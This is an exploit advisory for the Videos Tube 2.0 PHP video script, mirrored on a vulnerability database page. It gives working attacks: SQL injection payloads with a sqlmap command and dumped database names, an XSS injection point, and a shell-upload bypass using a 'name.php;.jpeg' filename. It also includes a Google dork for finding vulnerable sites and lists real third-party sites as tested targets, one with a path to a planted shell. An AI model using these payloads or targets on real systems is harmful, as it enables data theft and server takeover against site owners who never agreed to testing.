Vulners
Lucene search
Videos Tube 2.0 SQL Injection / XSS / Shell Upload
`Videos Tube 2.0 <= (SQL/XSS/Shell Upload) Multiple Vulnerabilities
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG -
[+] Greetz to : http://1337day.com - http://milw00rm.com
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
KnocKout, Septemb0x , BARCOD3 , _UnDeRTaKeR_
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ Turkey
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Videos Tube
|~Price : FREE
|~Version : 2.0, updated the lastest version.
|~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload
|~Google DORK : "© 2014, Videos Tube. Tüm Haklarý Saklýdýr."
|[~]Date : "15 KAS. 2014"
|[~]Tested on : Kali Linux
Tested on Demos;
http://demo.phpscriptlerim.com/free/videostube/
http://www.týger61.com/
http://www.birkovabuziddiasi.com/
http://video.egitimledirilis.com/
====================== SQL Injection Vulnerability (POST Method) ===============
Example; http://demo.phpscriptlerim.com/free/videostube/
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST :/ search=[SQL Injection]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[Post Method SQL Injection]&ara=
..
..
##############Exploitation sqlmap console.##########
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data"=search=&ara=" -p "search" --dbs
####################################################
---
Place: POST
Parameter: search
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: search=-6400' OR (6785=6785)#&ara=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: search=' AND SLEEP(5)#&ara=
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.34
back-end DBMS: MySQL 5.0.11
[01:16:58] [INFO] fetching database names
[01:16:58] [INFO] fetching number of databases
[01:16:58] [WARNING] reflective value(s) found and filtering out
[01:16:58] [INFO] resumed: 2
[01:16:58] [INFO] resumed: information_schema
[01:16:58] [INFO] resumed: phpscrip_videostube
available databases [2]:
[*] information_schema
[*] phpscrip_videostube
==============================================================================
==============================================================================
==================Cross Site Scripting Vulnerability =========================
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST to :/ search=[XSS]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[XSS]&ara=
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============================================================================
==============================================================================
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) =======
INFO;
performed primarily access the admin panel ; http://www.TARGET.com/yonetim/
then go..
http://www.VICTIM.com/upload/upload.php
for bypass shell file name "name.php;.jpeg"
and then using tamper data file can be loaded shell was tested!
TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php
=============================================================
# milw00rm.com [2014-11-15]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Nov 2014 00:00Current
0.7Low risk
Vulners AI Score0.7